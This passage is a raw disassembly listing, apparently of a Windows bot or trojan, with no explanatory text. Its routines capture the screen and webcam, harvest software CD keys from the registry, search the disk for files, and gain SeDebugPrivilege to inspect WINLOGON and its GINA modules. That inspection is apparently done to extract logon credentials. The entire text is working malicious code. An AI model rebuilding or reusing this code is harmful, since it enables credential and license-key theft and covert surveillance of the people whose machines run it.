mov [ebp+var_48], esi
mov [ebp+var_44], esi
mov [ebp+var_40], esi
mov [ebp+var_3C], esi
mov [ebp+var_38], ebx
mov [ebp+var_34], esi
call ds:off_424084
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jz short loc_4087B7
lea ecx, [ebp+var_14]
push esi
push ecx
lea ecx, [ebp+var_30]
push 0Eh
push ecx
push eax
call ds:dword_42407C ; WriteFile
lea eax, [ebp+var_14]
push esi
push eax
lea eax, [ebp+var_58]
push 28h
push eax
push [ebp+arg_0]
call ds:dword_42407C ; WriteFile
cmp ebx, esi
jz short loc_408799
lea eax, [ebp+var_14]
push esi
push eax
lea eax, [ebp+var_484]
push [ebp+var_8]
push eax
push [ebp+arg_0]
call ds:dword_42407C ; WriteFile
loc_408799: ; CODE XREF: sub_4085B3+1CC�j
lea eax, [ebp+var_14]
push esi
push eax
push edi
push [ebp+var_18]
push [ebp+arg_0]
call ds:dword_42407C ; WriteFile
push [ebp+arg_0]
call ds:off_424078
push 1
pop esi
loc_4087B7: ; CODE XREF: sub_4085B3+1A2�j
push [ebp+var_1C]
call ds:dword_43F5CC ; DeleteObject
push [ebp+var_4]
call ds:dword_43F530 ; DeleteDC
mov edi, [ebp+var_20]
loc_4087CC: ; CODE XREF: sub_4085B3+70�j
push edi
call ds:dword_43F530 ; DeleteDC
mov eax, esi
jmp short loc_4087E9
; ---------------------------------------------------------------------------
loc_4087D7: ; CODE XREF: sub_4085B3+C7�j
; sub_4085B3+D9�j ...
push edi
call ds:dword_43F530 ; DeleteDC
push [ebp+var_4]
call ds:dword_43F530 ; DeleteDC
loc_4087E7: ; CODE XREF: sub_4085B3+23�j
xor eax, eax
loc_4087E9: ; CODE XREF: sub_4085B3+222�j
pop edi
pop esi
pop ebx
leave
retn
sub_4085B3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4087EE proc near ; CODE XREF: sub_40EE72+46EB�p
var_34 = byte ptr -34h
var_20 = dword ptr -20h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 34h
push ebx
push esi
push edi
push 1
pop esi
xor ebx, ebx
push esi
push ds:dword_43E100
push 78h
push 0A0h
push ebx
push ebx
push 40000000h
push offset aWindow ; "Window"
call ds:dword_43F5C0
mov edi, eax
cmp edi, ebx
mov [ebp+var_4], edi
jnz short loc_40882C
mov eax, esi
jmp loc_4089E2
; ---------------------------------------------------------------------------
loc_40882C: ; CODE XREF: sub_4087EE+35�j
push edi
call ds:dword_43F608 ; IsWindow
test eax, eax
jz short loc_408849
push ebx
push [ebp+arg_4]
push 40Ah
push edi
call ds:dword_43F6C4 ; SendMessageA
jmp short loc_40884B
; ---------------------------------------------------------------------------
loc_408849: ; CODE XREF: sub_4087EE+47�j
xor eax, eax
loc_40884B: ; CODE XREF: sub_4087EE+59�j
cmp eax, ebx
jnz short loc_408856
loc_40884F: ; CODE XREF: sub_4087EE+88�j
; sub_4087EE+BC�j
mov ebx, esi
jmp loc_4089D7
; ---------------------------------------------------------------------------
loc_408856: ; CODE XREF: sub_4087EE+5F�j
push edi
call ds:dword_43F608 ; IsWindow
test eax, eax
jz short loc_408873
lea eax, [ebp+var_34]
push eax
push 2Ch
push 40Eh
push edi
call ds:dword_43F6C4 ; SendMessageA
loc_408873: ; CODE XREF: sub_4087EE+71�j
cmp [ebp+var_20], ebx
jz short loc_40884F
push edi
call ds:dword_43F608 ; IsWindow
test eax, eax
mov edi, 42Ch
jz short loc_408899
push ebx
push ebx
push edi
push [ebp+var_4]
call ds:dword_43F6C4 ; SendMessageA
mov [ebp+arg_4], eax
jmp short loc_40889C
; ---------------------------------------------------------------------------
loc_408899: ; CODE XREF: sub_4087EE+98�j
mov [ebp+arg_4], ebx
loc_40889C: ; CODE XREF: sub_4087EE+A9�j
push [ebp+arg_4]
call sub_417B89
cmp eax, ebx
pop ecx
mov [ebp+var_8], eax
jz short loc_40884F
push [ebp+arg_4]
call sub_417B89
mov esi, eax
pop ecx
cmp esi, ebx
jnz short loc_4088C3
push 1
pop ebx
jmp loc_4089D7
; ---------------------------------------------------------------------------
loc_4088C3: ; CODE XREF: sub_4087EE+CB�j
push [ebp+var_4]
call ds:dword_43F608 ; IsWindow
test eax, eax
jz short loc_4088E0
push [ebp+var_8]
push [ebp+arg_4]
push edi
push [ebp+var_4]
call ds:dword_43F6C4 ; SendMessageA
loc_4088E0: ; CODE XREF: sub_4087EE+E0�j
push [ebp+arg_4]
push [ebp+var_8]
push esi
call sub_417390
mov ecx, [ebp+arg_8]
add esp, 0Ch
cmp ecx, ebx
jg short loc_4088FB
mov ecx, 280h
loc_4088FB: ; CODE XREF: sub_4087EE+106�j
mov eax, [ebp+arg_C]
cmp eax, ebx
jg short loc_408907
mov eax, 1E0h
loc_408907: ; CODE XREF: sub_4087EE+112�j
push [ebp+var_4]
mov [esi+4], ecx
mov [esi+8], eax
mov word ptr [esi+0Eh], 10h
mov [esi+14h], ebx
mov [esi+10h], ebx
mov [esi+20h], ebx
mov [esi+24h], ebx
mov word ptr [esi+0Ch], 1
mov [esi+28h], bl
mov [esi+29h], bl
mov [esi+2Ah], bl
mov [esi+2Bh], bl
call ds:dword_43F608 ; IsWindow
test eax, eax
mov edi, 42Dh
jz short loc_408951
push esi
push [ebp+arg_4]
push edi
push [ebp+var_4]
call ds:dword_43F6C4 ; SendMessageA
loc_408951: ; CODE XREF: sub_4087EE+153�j
push [ebp+var_4]
call ds:dword_43F608 ; IsWindow
test eax, eax
jz short loc_40896E
push ebx
push ebx
push 43Dh
push [ebp+var_4]
call ds:dword_43F6C4 ; SendMessageA
loc_40896E: ; CODE XREF: sub_4087EE+16E�j
push [ebp+var_4]
call ds:dword_43F608 ; IsWindow
test eax, eax
jz short loc_40898D
push [ebp+arg_0]
push ebx
push 419h
push [ebp+var_4]
call ds:dword_43F6C4 ; SendMessageA
loc_40898D: ; CODE XREF: sub_4087EE+18B�j
push [ebp+var_4]
call ds:dword_43F608 ; IsWindow
test eax, eax
jz short loc_4089AA
push [ebp+var_8]
push [ebp+arg_4]
push edi
push [ebp+var_4]
call ds:dword_43F6C4 ; SendMessageA
loc_4089AA: ; CODE XREF: sub_4087EE+1AA�j
push [ebp+var_8]
call sub_417C3B
push esi
call sub_417C3B
pop ecx
pop ecx
push [ebp+var_4]
call ds:dword_43F608 ; IsWindow
test eax, eax
jz short loc_4089D7
push ebx
push ebx
push 40Bh
push [ebp+var_4]
call ds:dword_43F6C4 ; SendMessageA
loc_4089D7: ; CODE XREF: sub_4087EE+63�j
; sub_4087EE+D0�j ...
push [ebp+var_4]
call ds:dword_43F718 ; DestroyWindow
mov eax, ebx
loc_4089E2: ; CODE XREF: sub_4087EE+39�j
pop edi
pop esi
pop ebx
leave
retn
sub_4087EE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4089E7 proc near ; CODE XREF: sub_40EE72+47A4�p
var_90 = byte ptr -90h
var_7C = dword ptr -7Ch
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 90h
push ebx
push esi
push edi
push 1
pop esi
xor ebx, ebx
push esi
push ds:dword_43E100
push 78h
push 0A0h
push ebx
push ebx
push 40000000h
push offset aWindow ; "Window"
call ds:dword_43F5C0
mov edi, eax
cmp edi, ebx
jnz short loc_408A25
mov eax, esi
jmp loc_408C21
; ---------------------------------------------------------------------------
loc_408A25: ; CODE XREF: sub_4089E7+35�j
push edi
call ds:dword_43F608 ; IsWindow
test eax, eax
jz short loc_408A42
push ebx
push [ebp+arg_4]
push 40Ah
push edi
call ds:dword_43F6C4 ; SendMessageA
jmp short loc_408A44
; ---------------------------------------------------------------------------
loc_408A42: ; CODE XREF: sub_4089E7+47�j
xor eax, eax
loc_408A44: ; CODE XREF: sub_4089E7+59�j
cmp eax, ebx
jnz short loc_408A4F
loc_408A48: ; CODE XREF: sub_4089E7+8B�j
; sub_4089E7+BC�j
mov ebx, esi
jmp loc_408C18
; ---------------------------------------------------------------------------
loc_408A4F: ; CODE XREF: sub_4089E7+5F�j
push edi
call ds:dword_43F608 ; IsWindow
test eax, eax
jz short loc_408A6F
lea eax, [ebp+var_90]
push eax
push 2Ch
push 40Eh
push edi
call ds:dword_43F6C4 ; SendMessageA
loc_408A6F: ; CODE XREF: sub_4089E7+71�j
cmp [ebp+var_7C], ebx
jz short loc_408A48
push edi
call ds:dword_43F608 ; IsWindow
test eax, eax
jz short loc_408A92
push ebx
push ebx
push 42Ch
push edi
call ds:dword_43F6C4 ; SendMessageA
mov [ebp+arg_4], eax
jmp short loc_408A95
; ---------------------------------------------------------------------------
loc_408A92: ; CODE XREF: sub_4089E7+96�j
mov [ebp+arg_4], ebx
loc_408A95: ; CODE XREF: sub_4089E7+A9�j
push [ebp+arg_4]
call sub_417B89
cmp eax, ebx
pop ecx
mov [ebp+var_4], eax
jz short loc_408A48
push [ebp+arg_4]
call sub_417B89
mov esi, eax
pop ecx
cmp esi, ebx
jnz short loc_408ABC
push 1
pop ebx
jmp loc_408C18
; ---------------------------------------------------------------------------
loc_408ABC: ; CODE XREF: sub_4089E7+CB�j
push edi
call ds:dword_43F608 ; IsWindow
test eax, eax
jz short loc_408AD9
push [ebp+var_4]
push [ebp+arg_4]
push 42Ch
push edi
call ds:dword_43F6C4 ; SendMessageA
loc_408AD9: ; CODE XREF: sub_4089E7+DE�j
push [ebp+arg_4]
push [ebp+var_4]
push esi
call sub_417390
mov ecx, [ebp+arg_C]
add esp, 0Ch
cmp ecx, ebx
jg short loc_408AF4
mov ecx, 0A0h
loc_408AF4: ; CODE XREF: sub_4089E7+106�j
mov eax, [ebp+arg_10]
cmp eax, ebx
jg short loc_408AFE
push 78h
pop eax
loc_408AFE: ; CODE XREF: sub_4089E7+112�j
push edi
mov [esi+4], ecx
mov [esi+8], eax
mov word ptr [esi+0Eh], 10h
mov [esi+14h], ebx
mov [esi+10h], ebx
mov [esi+20h], ebx
mov [esi+24h], ebx
mov word ptr [esi+0Ch], 1
mov [esi+28h], bl
mov [esi+29h], bl
mov [esi+2Ah], bl
mov [esi+2Bh], bl
call ds:dword_43F608 ; IsWindow
test eax, eax
jz short loc_408B43
push esi
push [ebp+arg_4]
push 42Dh
push edi
call ds:dword_43F6C4 ; SendMessageA
loc_408B43: ; CODE XREF: sub_4089E7+14A�j
push edi
call ds:dword_43F608 ; IsWindow
test eax, eax
jz short loc_408B60
lea eax, [ebp+var_64]
push eax
push 60h
push 441h
push edi
call ds:dword_43F6C4 ; SendMessageA
loc_408B60: ; CODE XREF: sub_4089E7+165�j
push edi
mov [ebp+var_60], ebx
mov [ebp+var_3C], ebx
mov [ebp+var_38], ebx
mov [ebp+var_34], ebx
mov [ebp+var_30], 1
mov [ebp+var_2C], 5
mov [ebp+var_64], 1046Ah
call ds:dword_43F608 ; IsWindow
test eax, eax
jz short loc_408B9E
lea eax, [ebp+var_64]
push eax
push 60h
push 440h
push edi
call ds:dword_43F6C4 ; SendMessageA
loc_408B9E: ; CODE XREF: sub_4089E7+1A3�j
push edi
call ds:dword_43F608 ; IsWindow
test eax, eax
jz short loc_408BB9
push [ebp+arg_0]
push ebx
push 414h
push edi
call ds:dword_43F6C4 ; SendMessageA
loc_408BB9: ; CODE XREF: sub_4089E7+1C0�j
push edi
call ds:dword_43F608 ; IsWindow
test eax, eax
jz short loc_408BD2
push ebx
push ebx
push 43Eh
push edi
call ds:dword_43F6C4 ; SendMessageA
loc_408BD2: ; CODE XREF: sub_4089E7+1DB�j
push edi
call ds:dword_43F608 ; IsWindow
test eax, eax
jz short loc_408BEF
push [ebp+var_4]
push [ebp+arg_4]
push 42Dh
push edi
call ds:dword_43F6C4 ; SendMessageA
loc_408BEF: ; CODE XREF: sub_4089E7+1F4�j
push [ebp+var_4]
call sub_417C3B
push esi
call sub_417C3B
pop ecx
pop ecx
push edi
call ds:dword_43F608 ; IsWindow
test eax, eax
jz short loc_408C18
push ebx
push ebx
push 40Bh
push edi
call ds:dword_43F6C4 ; SendMessageA
loc_408C18: ; CODE XREF: sub_4089E7+63�j
; sub_4089E7+D0�j ...
push edi
call ds:dword_43F718 ; DestroyWindow
mov eax, ebx
loc_408C21: ; CODE XREF: sub_4089E7+39�j
pop edi
pop esi
pop ebx
leave
retn
sub_4089E7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408C26 proc near ; CODE XREF: sub_40EE72+5889�p
var_3F4 = byte ptr -3F4h
var_2F0 = byte ptr -2F0h
var_F0 = byte ptr -0F0h
var_70 = byte ptr -70h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 3F4h
push ebx
xor ebx, ebx
cmp ds:off_42B894, ebx
mov [ebp+var_C], 80h
jz loc_408DC7
push esi
push edi
mov eax, offset off_42B894
mov esi, offset dword_42B8A0
mov edi, offset aSCdKeyS_ ; "%s CD Key: (%s)."
loc_408C56: ; CODE XREF: sub_408C26+199�j
lea ecx, [ebp+var_4]
push ecx
push 20019h
push ebx
push dword ptr [eax]
push dword ptr [esi-10h]
call ds:dword_43F6D8 ; RegOpenKeyExA
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_F0]
push eax
push ebx
push ebx
push dword ptr [esi-8]
push [ebp+var_4]
call ds:dword_43F574 ; RegQueryValueExA
test eax, eax
jnz loc_408DAD
mov eax, [esi]
cmp eax, ebx
jz loc_408D71
push eax
lea eax, [ebp+var_F0]
push eax
lea eax, [ebp+var_3F4]
push offset aSS_3 ; "%s\\%s"
push eax
call sub_4172AE
lea eax, [ebp+var_3F4]
push offset aR ; "r"
push eax
call sub_4179A8
add esp, 18h
cmp eax, ebx
mov [ebp+var_8], eax
jz loc_408DAD
push eax
loc_408CCF: ; CODE XREF: sub_408C26+D4�j
lea eax, [ebp+var_70]
push 64h
push eax
call sub_41900C
add esp, 0Ch
test eax, eax
jz loc_408D66
push dword ptr [esi+4]
lea eax, [ebp+var_70]
push eax
call sub_417880
pop ecx
test eax, eax
pop ecx
jz short loc_408CFC
push [ebp+var_8]
jmp short loc_408CCF
; ---------------------------------------------------------------------------
loc_408CFC: ; CODE XREF: sub_408C26+CF�j
push 3Dh
push dword ptr [esi+4]
call sub_418F50
pop ecx
test eax, eax
pop ecx
jz short loc_408D2A
lea eax, [ebp+var_70]
push offset asc_42CA98 ; "="
push eax
call sub_418B6E
push offset asc_42CA98 ; "="
push ebx
call sub_418B6E
add esp, 10h
jmp short loc_408D2D
; ---------------------------------------------------------------------------
loc_408D2A: ; CODE XREF: sub_408C26+E4�j
lea eax, [ebp+var_70]
loc_408D2D: ; CODE XREF: sub_408C26+102�j
push eax
lea eax, [ebp+var_2F0]
push dword ptr [esi-4]
push edi
push eax
call sub_4172AE
add esp, 10h
lea eax, [ebp+var_2F0]
push ebx
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40D679
lea eax, [ebp+var_2F0]
push eax
call sub_40BF6D
add esp, 18h
loc_408D66: ; CODE XREF: sub_408C26+B9�j
push [ebp+var_8]
call sub_417900
pop ecx
jmp short loc_408DAD
; ---------------------------------------------------------------------------
loc_408D71: ; CODE XREF: sub_408C26+6A�j
lea eax, [ebp+var_F0]
push eax
lea eax, [ebp+var_2F0]
push dword ptr [esi-4]
push edi
push eax
call sub_4172AE
push ebx
lea eax, [ebp+var_2F0]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40D679
lea eax, [ebp+var_2F0]
push eax
call sub_40BF6D
add esp, 28h
loc_408DAD: ; CODE XREF: sub_408C26+60�j
; sub_408C26+A2�j ...
push [ebp+var_4]
call ds:dword_43F644 ; RegCloseKey
add esi, 18h
cmp [esi-0Ch], ebx
lea eax, [esi-0Ch]
jnz loc_408C56
pop edi
pop esi
loc_408DC7: ; CODE XREF: sub_408C26+19�j
pop ebx
leave
retn
sub_408C26 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408DCA proc near ; DATA XREF: sub_40EE72+3D60�o
var_49C = byte ptr -49Ch
var_29C = dword ptr -29Ch
var_298 = byte ptr -298h
var_218 = byte ptr -218h
var_115 = byte ptr -115h
var_114 = byte ptr -114h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 49Ch
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov ecx, 0A7h
mov esi, eax
lea edi, [ebp+var_29C]
rep movsd
mov dword ptr [eax+298h], 1
lea eax, [ebp+var_114]
push eax
call sub_417AB0
xor ebx, ebx
cmp [ebp+eax+var_115], 5Ch
pop ecx
jnz short loc_408E1F
lea eax, [ebp+var_114]
push eax
call sub_417AB0
pop ecx
mov [ebp+eax+var_115], bl
loc_408E1F: ; CODE XREF: sub_408DCA+3F�j
lea eax, [ebp+var_218]
push eax
push offset unk_42CAEC
lea eax, [ebp+var_49C]
push 200h
push eax
call sub_41782A
add esp, 10h
cmp [ebp+var_8], ebx
jnz short loc_408E64
push ebx
lea eax, [ebp+var_49C]
push [ebp+var_C]
push eax
lea eax, [ebp+var_298]
push eax
push [ebp+var_29C]
call sub_40D679
add esp, 14h
loc_408E64: ; CODE XREF: sub_408DCA+78�j
lea eax, [ebp+var_114]
push ebx
push eax
lea eax, [ebp+var_218]
push eax
lea eax, [ebp+var_298]
push [ebp+var_C]
push eax
push [ebp+var_29C]
call sub_408EE5
add esp, 18h
push eax
lea eax, [ebp+var_49C]
push offset unk_42CABC
push eax
call sub_4172AE
add esp, 0Ch
cmp [ebp+var_8], ebx
jnz short loc_408EC5
push ebx
lea eax, [ebp+var_49C]
push [ebp+var_C]
push eax
lea eax, [ebp+var_298]
push eax
push [ebp+var_29C]
call sub_40D679
add esp, 14h
loc_408EC5: ; CODE XREF: sub_408DCA+D9�j
lea eax, [ebp+var_49C]
push eax
call sub_40BF6D
push [ebp+var_10]
call sub_417076
pop ecx
pop ecx
push ebx
call ds:dword_424054 ; ExitThread
pop edi
pop esi
pop ebx
sub_408DCA endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408EE5 proc near ; CODE XREF: sub_408DCA+B9�p
; sub_408EE5+9E�p
var_54C = byte ptr -54Ch
var_34C = byte ptr -34Ch
var_248 = byte ptr -248h
var_144 = byte ptr -144h
var_118 = byte ptr -118h
var_117 = byte ptr -117h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 54Ch
push ebx
push esi
push edi
mov esi, 104h
push [ebp+arg_10]
lea eax, [ebp+var_248]
push offset aS_5 ; "%s\\*"
push esi
push eax
call sub_41782A
mov edi, ds:off_4240BC
add esp, 10h
lea eax, [ebp+var_144]
push eax
lea eax, [ebp+var_248]
push eax
call edi ; sub_49B334
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
mov ebx, offset aSS_3 ; "%s\\%s"
jz short loc_408FA2
loc_408F31: ; CODE XREF: sub_408EE5+BB�j
test [ebp+var_144], 10h
jz short loc_408F8E
cmp [ebp+var_118], 2Eh
jnz short loc_408F55
cmp [ebp+var_117], 0
jz short loc_408F8E
cmp [ebp+var_117], 2Eh
jz short loc_408F8E
loc_408F55: ; CODE XREF: sub_408EE5+5C�j
lea eax, [ebp+var_118]
push eax
lea eax, [ebp+var_34C]
push [ebp+arg_10]
push ebx
push esi
push eax
call sub_41782A
push [ebp+arg_14]
lea eax, [ebp+var_34C]
push eax
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_408EE5
add esp, 2Ch
mov [ebp+arg_14], eax
loc_408F8E: ; CODE XREF: sub_408EE5+53�j
; sub_408EE5+65�j ...
lea eax, [ebp+var_144]
push eax
push [ebp+var_4]
call ds:off_4240B8
test eax, eax
jnz short loc_408F31
loc_408FA2: ; CODE XREF: sub_408EE5+4A�j
push [ebp+var_4]
call ds:off_4240AC
push [ebp+arg_C]
lea eax, [ebp+var_248]
push [ebp+arg_10]
push ebx
push esi
push eax
call sub_41782A
add esp, 14h
lea eax, [ebp+var_144]
push eax
lea eax, [ebp+var_248]
push eax
call edi ; sub_49B334
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_409028
loc_408FD9: ; CODE XREF: sub_408EE5+141�j
lea eax, [ebp+var_118]
inc [ebp+arg_14]
push eax
lea eax, [ebp+var_54C]
push [ebp+arg_10]
push offset aFoundSS ; " Found: %s\\%s"
push 200h
push eax
call sub_41782A
push 1
lea eax, [ebp+var_54C]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40D679
add esp, 28h
lea eax, [ebp+var_144]
push eax
push esi
call ds:off_4240B8
test eax, eax
jnz short loc_408FD9
loc_409028: ; CODE XREF: sub_408EE5+F2�j
push esi
call ds:off_4240AC
mov eax, [ebp+arg_14]
pop edi
pop esi
pop ebx
leave
retn
sub_408EE5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409037 proc near ; DATA XREF: sub_40EE72+5235�o
var_29C = byte ptr -29Ch
var_9C = dword ptr -9Ch
var_98 = byte ptr -98h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 29Ch
mov eax, [ebp+arg_0]
push esi
push edi
push 25h
pop ecx
mov esi, eax
lea edi, [ebp+var_9C]
push 1
rep movsd
pop esi
mov [eax+90h], esi
call sub_40B78A
cmp eax, esi
mov [ebp+var_4], eax
jz short loc_409076
cmp eax, 2
jz short loc_409076
push offset unk_42CD60
jmp loc_4091B5
; ---------------------------------------------------------------------------
loc_409076: ; CODE XREF: sub_409037+2E�j
; sub_409037+33�j
push esi
push offset aSedebugprivile ; "SeDebugPrivilege"
call sub_41511D
pop ecx
test eax, eax
pop ecx
jz loc_4091B0
push ebx
push offset aNtdll_dll ; "NTDLL.DLL"
call ds:off_4240E0
mov esi, ds:off_4240DC
mov edi, eax
push offset aNtquerysystemi ; "NtQuerySystemInformation"
push edi
mov [ebp+var_8], edi
call esi ; sub_49C076
push offset aRtlcreatequery ; "RtlCreateQueryDebugBuffer"
push edi
mov ds:dword_43F314, eax
call esi ; sub_49C076
push offset aRtlqueryproces ; "RtlQueryProcessDebugInformation"
push edi
mov ds:dword_43F308, eax
call esi ; sub_49C076
push offset aRtldestroyquer ; "RtlDestroyQueryDebugBuffer"
push edi
mov ds:dword_43F518, eax
call esi ; sub_49C076
push offset aRtlrundecodeun ; "RtlRunDecodeUnicodeString"
push edi
mov ds:dword_43F310, eax
call esi ; sub_49C076
mov ds:dword_43F30C, eax
call sub_409209
test eax, eax
mov [ebp+arg_0], eax
jz loc_409183
mov esi, ds:dword_4240D8
mov edi, 400h
mov ebx, offset dword_43E308
push edi
push ebx
push offset aUsername ; "USERNAME"
call esi ; GetEnvironmentVariableW
push edi
mov edi, offset dword_43EB08
push edi
push offset aUserdomain ; "USERDOMAIN"
call esi ; GetEnvironmentVariableW
cmp [ebp+var_4], 1
push offset dword_43F520
push [ebp+arg_0]
jnz short loc_40912F
call sub_409392
jmp short loc_409134
; ---------------------------------------------------------------------------
loc_40912F: ; CODE XREF: sub_409037+EF�j
call sub_409539
loc_409134: ; CODE XREF: sub_409037+F6�j
pop ecx
test eax, eax
pop ecx
jz short loc_40917C
cmp ds:dword_43F520, 0
jnz short loc_409163
push ebx
push edi
push [ebp+arg_0]
lea eax, [ebp+var_29C]
push offset unk_42CC0C
push 200h
push eax
call sub_41782A
add esp, 18h
jmp short loc_409196
; ---------------------------------------------------------------------------
loc_409163: ; CODE XREF: sub_409037+10A�j
cmp [ebp+var_4], 1
push [ebp+arg_0]
jnz short loc_409173
call sub_40966F
jmp short loc_409178
; ---------------------------------------------------------------------------
loc_409173: ; CODE XREF: sub_409037+133�j
call sub_409706
loc_409178: ; CODE XREF: sub_409037+13A�j
pop ecx
push eax
jmp short loc_409188
; ---------------------------------------------------------------------------
loc_40917C: ; CODE XREF: sub_409037+101�j
push offset unk_42CBC4
jmp short loc_409188
; ---------------------------------------------------------------------------
loc_409183: ; CODE XREF: sub_409037+B6�j
push offset unk_42CB80
loc_409188: ; CODE XREF: sub_409037+143�j
; sub_409037+14A�j
lea eax, [ebp+var_29C]
push eax
call sub_4172AE
pop ecx
pop ecx
loc_409196: ; CODE XREF: sub_409037+12A�j
push 0
push offset aSedebugprivile ; "SeDebugPrivilege"
call sub_41511D
pop ecx
pop ecx
push [ebp+var_8]
call ds:off_4240D4
pop ebx
jmp short loc_4091C3
; ---------------------------------------------------------------------------
loc_4091B0: ; CODE XREF: sub_409037+4E�j
push offset unk_42CB3C
loc_4091B5: ; CODE XREF: sub_409037+3A�j
lea eax, [ebp+var_29C]
push eax
call sub_4172AE
pop ecx
pop ecx
loc_4091C3: ; CODE XREF: sub_409037+177�j
xor esi, esi
cmp [ebp+var_10], esi
jnz short loc_4091EA
push esi
lea eax, [ebp+var_29C]
push [ebp+var_14]
push eax
lea eax, [ebp+var_98]
push eax
push [ebp+var_9C]
call sub_40D679
add esp, 14h
loc_4091EA: ; CODE XREF: sub_409037+191�j
lea eax, [ebp+var_29C]
push eax
call sub_40BF6D
push [ebp+var_18]
call sub_417076
pop ecx
pop ecx
push esi
call ds:dword_424054 ; ExitThread
pop edi
pop esi
sub_409037 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_409209 proc near ; CODE XREF: sub_409037+AC�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
sub esp, 18h
and [esp+18h+var_4], 0
and [esp+18h+var_14], 0
push ebx
push ebp
push esi
mov esi, ds:dword_4240EC
mov ebx, 100h
push edi
push ebx
push 8
call esi ; GetProcessHeap
mov edi, ds:dword_4240E8
push eax
call edi ; RtlAllocateHeap
mov ebp, eax
lea eax, [esp+28h+var_14]
push eax
push ebx
push ebp
push 10h
call ds:dword_43F314
push ebp
push 0
call esi ; GetProcessHeap
push eax
call ds:dword_4240E4 ; RtlFreeHeap
push [esp+28h+var_14]
push 8
call esi ; GetProcessHeap
push eax
call edi ; RtlAllocateHeap
mov ebp, eax
mov eax, [esp+28h+var_14]
lea ecx, [esp+28h+var_C]
mov [esp+28h+var_C], eax
push ecx
push eax
push ebp
push 10h
call ds:dword_43F314
test eax, eax
jnz short loc_4092F6
mov eax, [esp+28h+var_C]
shr eax, 4
mov [esp+28h+var_10], eax
jz short loc_4092F6
push 1
mov ebx, ebp
pop ecx
cmp eax, ecx
mov [esp+28h+var_18], ecx
jb short loc_4092F6
loc_409292: ; CODE XREF: sub_409209+EB�j
cmp word ptr [ebx+8], 5
jnz short loc_4092E9
push 0
push 0
call ds:dword_43F308
mov edi, eax
push edi
push 1
push dword ptr [ebx+4]
call ds:dword_43F518
test eax, eax
jnz short loc_4092DA
mov eax, [edi+60h]
push offset aWinlogon ; "WINLOGON"
mov [esp+2Ch+var_8], eax
lea eax, [edi+80h]
push eax
call sub_419063
pop ecx
push eax
call sub_417880
pop ecx
test eax, eax
pop ecx
jnz short loc_40930E
loc_4092DA: ; CODE XREF: sub_409209+AA�j
test edi, edi
jz short loc_4092E5
push edi
call ds:dword_43F310
loc_4092E5: ; CODE XREF: sub_409209+D3�j
mov eax, [esp+28h+var_10]
loc_4092E9: ; CODE XREF: sub_409209+8E�j
add ebx, 10h
inc [esp+28h+var_18]
cmp [esp+28h+var_18], eax
jbe short loc_409292
loc_4092F6: ; CODE XREF: sub_409209+6D�j
; sub_409209+7A�j ...
xor edi, edi
loc_4092F8: ; CODE XREF: sub_409209+17D�j
push ebp
push 0
call esi ; GetProcessHeap
push eax
call ds:dword_4240E4 ; RtlFreeHeap
mov eax, edi
loc_409306: ; CODE XREF: sub_409209+184�j
pop edi
pop esi
pop ebp
pop ebx
add esp, 18h
retn
; ---------------------------------------------------------------------------
loc_40930E: ; CODE XREF: sub_409209+CF�j
and [esp+28h+var_10], 0
cmp [esp+28h+var_8], 0
jbe short loc_409377
lea eax, [edi+80h]
mov [esp+28h+var_18], eax
loc_409324: ; CODE XREF: sub_409209+16C�j
add [esp+28h+var_18], 11Ch
push offset aNwgina ; "NWGINA"
push [esp+2Ch+var_18]
call sub_419063
pop ecx
push eax
call sub_417880
pop ecx
test eax, eax
pop ecx
jnz short loc_40938B
push offset aMsgina ; "MSGINA"
push [esp+2Ch+var_18]
call sub_419063
pop ecx
push eax
call sub_417880
pop ecx
test eax, eax
pop ecx
jnz short loc_409369
mov eax, [ebx+4]
mov [esp+28h+var_4], eax
loc_409369: ; CODE XREF: sub_409209+157�j
inc [esp+28h+var_10]
mov eax, [esp+28h+var_10]
cmp eax, [esp+28h+var_8]
jb short loc_409324
loc_409377: ; CODE XREF: sub_409209+10F�j
test edi, edi
jz short loc_409382
push edi
